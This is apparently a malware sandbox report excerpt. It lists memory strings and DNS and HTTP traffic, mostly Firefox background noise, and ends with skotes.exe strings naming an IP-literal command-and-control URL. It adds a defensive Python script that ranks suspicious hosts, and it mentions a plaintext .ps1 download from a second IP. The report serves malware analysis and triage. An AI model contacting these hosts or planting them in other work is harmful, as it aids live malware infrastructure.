Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/Get to a Wikipedia page fast, from anywhere on the web. Just highlight any webpage text and right-click to open the context menu to start a Wikipedia search. equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/(browserSettings.update.channel == "release") && (!((currentDate|date - profileAgeCreated|date) / 3600000 <= 24)) && (version|versionCompare('116.!') >= 0)moz-extension://bfdd6cf3-6cd6-4fa2-bc72-2c3d2e7d20f8/shims/microsoftLogin.js equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/(browserSettings.update.channel == "release") && (!((currentDate|date - profileAgeCreated|date) / 3600000 <= 24)) && (version|versionCompare('116.!') >= 0)moz-extension://bfdd6cf3-6cd6-4fa2-bc72-2c3d2e7d20f8/shims/microsoftLogin.js equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.twitter.com (Twitter)
Source: firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/Firefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:(currentDate|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' | preferenceValue == true(browserSettings.update.channel == "release") && ((experiment.slug in activeRollouts) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))(browserSettings.update.channel == "release") && ((experiment.slug in activeExperiments) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))New features include Inline Image Viewer, Never Ending Reddit (never click 'next page' again), Keyboard Navigation, Account Switcher, and User Tagger. equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/Firefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:(currentDate|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' | preferenceValue == true(browserSettings.update.channel == "release") && ((experiment.slug in activeRollouts) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))(browserSettings.update.channel == "release") && ((experiment.slug in activeExperiments) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))New features include Inline Image Viewer, Never Ending Reddit (never click 'next page' again), Keyboard Navigation, Account Switcher, and User Tagger. equals www.twitter.com (Twitter)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/Firefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:(currentDate|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' | preferenceValue == true(browserSettings.update.channel == "release") && ((experiment.slug in activeRollouts) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))(browserSettings.update.channel == "release") && ((experiment.slug in activeExperiments) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))New features include Inline Image Viewer, Never Ending Reddit (never click 'next page' again), Keyboard Navigation, Account Switcher, and User Tagger. equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3316913295.000001A8B49F6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3316913295.000001A8B49F6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3316913295.000001A8B49F6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: powershell.exe, 00000007.00000002.3091318017.00000000086DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account 1PN equals www.youtube.com (Youtube)
Source: powershell.exe, 00000007.00000002.3091318017.00000000086DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account NN equals www.youtube.com (Youtube)
Source: powershell.exe, 00000007.00000002.3030468982.0000000004BC6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3343255794.000001A8B7E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: History.17.dr String found in binary or memory: https://www.youtube.com/accountYouTube equals www.youtube.com (Youtube)
Source: History.17.dr String found in binary or memory: https://www.youtube.com/accountYouTube/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountbound fixupAndLoadURIStringLOAD_FLAGS_ERROR_LOAD_CHANGES_RVbound _updateEnabledStateobserve/secondaryActions< equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3270733582.000001A8B8604000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: firefox.exe, 0000000B.00000003.2984314258.0000027D5D6DD000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.2991420610.0000027D5D6E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: n]8p8https://www.youtube.com/account --attempting-deelevationUser equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3236983756.000001A8BFD4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: nmoz-nullprincipal:{a7578a0f-09bf-4e44-b413-18f89f298fa5}?https://www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000016.00000002.3284374660.0000029D56100000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3291692182.000002B9C2CA0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3290620208.000001F42CED0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: pData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Fir equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: previousHandler.preferredAction.https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: resource://search-extensions/google/*://*.adsafeprotected.com/jsvid?**://securepubads.g.doubleclick.net/gampad/*ad*resource://search-extensions/amazondotcom/--autocomplete-popup-separator-coloraddons-search-detection@mozilla.comresource://search-extensions/wikipedia/*://www.facebook.com/platform/impression.php*https://ads.stickyadstv.com/firefox-etp*://ads.stickyadstv.com/user-matching*app.update.background.enabled=false equals www.facebook.com (Facebook)
Source: firefox.exe, 0000000B.00000003.2984314258.0000027D5D6DD000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.2991420610.0000027D5D6E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: s://www.youtube.com/account --attempting-deelevation equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3345132926.000001A8B7EE2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3233508837.000001A8C3D6E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3263352248.000001A8C37E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000003.3238343935.000001A8C3789000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3111075375.000001A8B74FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3340745234.000001A8B7CDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3233508837.000001A8C3D6E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3262748007.000001A8C3DBD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com- equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3255394267.000001A8B8DAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com@ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3270733582.000001A8B8613000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3336939375.000001A8B74B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3108722427.000001A8B86B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000003.3246944068.000001A8B91AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x.S........[tlsflags0x00000000]www.youtube.com:443^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3340745234.000001A8B7CCF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3340745234.000001A8B7CAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: xabout:certerror?e=nssBadCert&u=https%3A//www.youtube.com/account&c=UTF-8&d=%20 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3262808062.000001A8C3D9C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3233508837.000001A8C3D6E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3340745234.000001A8B7CCF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: xe=nssBadCert&u=https%3A//www.youtube.com/account&c=UTF-8&d=%20 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3336939375.000001A8B7453000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: xhttps://www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3340745234.000001A8B7CCF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3316913295.000001A8B49BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3340745234.000001A8B7CAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: xhttps://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3270733582.000001A8B8604000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: xhttps://www.youtube.com^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3240111814.000001A8BFFCD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ~predictor-origin,:https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: www.youtube.com
Source: global traffic DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: youtube-ui.l.google.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: example.org
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: push.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: accounts.youtube.com
Source: global traffic DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: play.google.com
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: unknown HTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message
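The network records in this report (the DNS queries above, the DNS-over-HTTPS POST to chrome.cloudflare-dns.com, and the URL strings that follow, among them the skotes.exe strings pointing at http://185.215.113.43/Zu7JuNko/index.php and the plaintext-HTTP .ps1 download from 31.41.244.11) are buried in Firefox and Mozilla background traffic. The Python script below is an added example written for this page; it is not Joe Sandbox tooling or part of the report. It parses records in this report's line format, extracts hosts and URLs, trims the memory garbage glued onto URL strings (`index.php&`, `index.php;A`), drops hosts under an assumed allowlist of browser and vendor domains, and ranks the rest: IP-literal hosts and plaintext HTTP fetches of scripts or binaries score highest, and a public DoH resolver is tagged because a DoH session removes the plaintext DNS visibility the "DNS query" records otherwise give. The allowlist, the DoH host list, the scoring weights and the sample records (copied from lines of this report) are assumptions of the example, not data from the sandbox.

```python
"""Triage of Joe Sandbox style network records (added example, not part of
Joe Sandbox or of the sample): parse DNS/HTTP/'String found' lines, extract
hosts and URLs, drop assumed browser/vendor noise and rank what is left."""
import ipaddress
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample: records copied from the report (process names, memory
# region ids and URLs are the report's own, trailing memory garbage included).
SAMPLE_REPORT = """\
Source: global traffic DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: unknown HTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message
Source: skotes.exe, 00000006.00000002.3278202583.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000006.00000002.3278202583.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php&
Source: skotes.exe, 00000006.00000002.3278202583.00000000009C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/5124158732/KQGBYWk.ps1swsock.dll
Source: powershell.exe, 00000007.00000002.3051147504.0000000005AD3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
"""

# Assumed allowlist (suffix match): browser, vendor PKI and PowerShell module
# hosts that show up in this report as background noise.
NOISE_SUFFIXES = ("mozilla.com", "mozilla.org", "mozilla.net", "mozgcp.net",
                  "firefox.com", "getpocket.com", "google.com", "youtube.com",
                  "googleusercontent.com", "digicert.com", "lencr.org", "nuget.org", "xmlsoap.org")
# Assumed list of public DNS-over-HTTPS resolvers.
DOH_HOSTS = ("chrome.cloudflare-dns.com", "mozilla.cloudflare-dns.com", "dns.google")
PAYLOAD_EXT = re.compile(r"\.(?:ps1|exe|dll|bat|vbs|hta)\b", re.I)
RE_SOURCE = re.compile(r"^Source:\s*([^\s,]+)")
RE_DNS = re.compile(r"DNS query:\s*([A-Za-z0-9.-]+)")
# Header line breaks were lost in extraction, so the Host value runs straight
# into the next header name ("...comConnection"): stop at the first capital.
RE_HTTP = re.compile(r"HTTP traffic detected:\s*([A-Z]+)\s+(\S+)\s+HTTP/1\.[01]"
                     r"Host:\s*([a-z0-9.-]+?)(?=[A-Z]|$)")
RE_URL = re.compile(r"https?://[^\s\"'<>]+")
SAFE_PATH = re.compile(r"^[A-Za-z0-9._~/%-]*")
HOSTNAME_OK = re.compile(r"^[a-z0-9.-]+$")


def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def is_noise(host):
    return any(host == s or host.endswith("." + s) for s in NOISE_SUFFIXES)


def normalize_url(raw):
    """(host, url) with the path cut at the first character that cannot belong to
    a URL path, dropping garbage glued to memory strings such as 'index.php&'."""
    try:
        parts = urlsplit(raw)
        host = (parts.hostname or "").lower()
    except ValueError:
        return None
    if not HOSTNAME_OK.match(host):
        return None
    path = SAFE_PATH.match(parts.path).group(0) or "/"
    return host, f"{parts.scheme}://{host}{path}"


def triage(report_text):
    """Map host -> {score, reasons, processes, urls, doh_post} for every host seen."""
    hosts = defaultdict(lambda: {"score": 0, "reasons": set(), "processes": set(),
                                 "urls": set(), "doh_post": False})
    for line in report_text.splitlines():
        src = RE_SOURCE.match(line)
        if not src:
            continue
        proc = src.group(1)
        for host in RE_DNS.findall(line):
            hosts[host.lower()]["processes"].add(proc)
        http = RE_HTTP.search(line)
        if http:
            _method, path, host = http.groups()
            hosts[host]["processes"].add(proc)
            if path.startswith("/dns-query") or "application/dns-message" in line:
                hosts[host]["doh_post"] = True
        for raw in RE_URL.findall(line):
            norm = normalize_url(raw)
            if norm:
                hosts[norm[0]]["processes"].add(proc)
                hosts[norm[0]]["urls"].add(norm[1])
    for host, e in hosts.items():
        if host in DOH_HOSTS or e["doh_post"]:
            e["score"] += 1
            e["reasons"].add("DoH resolver: plaintext DNS visibility lost")
        elif is_noise(host):
            e["reasons"].add("browser/vendor background noise")
        else:
            if is_ip_literal(host):
                e["score"] += 3
                e["reasons"].add("IP-literal host, no DNS name to pivot on")
            if any(u.startswith("http://") and PAYLOAD_EXT.search(u) for u in e["urls"]):
                e["score"] += 2
                e["reasons"].add("plaintext HTTP fetch of a script or binary")
        for key in ("reasons", "processes", "urls"):
            e[key] = sorted(e[key])
    return dict(hosts)


def ranked(report_text):
    """Hosts ordered by descending score, then name."""
    return sorted(triage(report_text).items(), key=lambda kv: (-kv[1]["score"], kv[0]))
```

Run `ranked(SAMPLE_REPORT)` (or feed it the whole report) and the two skotes.exe hosts come out on top, the DoH resolver next, and the Firefox and PowerShell module hosts at zero. The scores are a reading aid, not a verdict: a host scores 0 because it matched the allowlist, not because it was verified benign, and path trimming stops only at characters that cannot occur in a path, so strings such as `index.phpncoded` keep their trailing letters; compare by host before comparing by full URL.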
Source: firefox.exe, 00000010.00000002.3302124352.000001A8A5F6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: http://127.0.0.1:
Source: skotes.exe, 00000006.00000002.3278202583.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/
Source: skotes.exe, 00000006.00000002.3278202583.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/3405117-2476756634-1003
Source: skotes.exe, 00000006.00000002.3278202583.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000006.00000002.3278202583.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php&
Source: skotes.exe, 00000006.00000002.3278202583.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php;A
Source: skotes.exe, 00000006.00000002.3278202583.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpOAP
Source: skotes.exe, 00000006.00000002.3278202583.0000000000998000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpa
Source: skotes.exe, 00000006.00000002.3278202583.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpc
Source: skotes.exe, 00000006.00000002.3278202583.00000000009EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpf
Source: skotes.exe, 00000006.00000002.3278202583.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpkAl
Source: skotes.exe, 00000006.00000002.3278202583.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
Source: skotes.exe, 00000006.00000002.3278202583.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded%
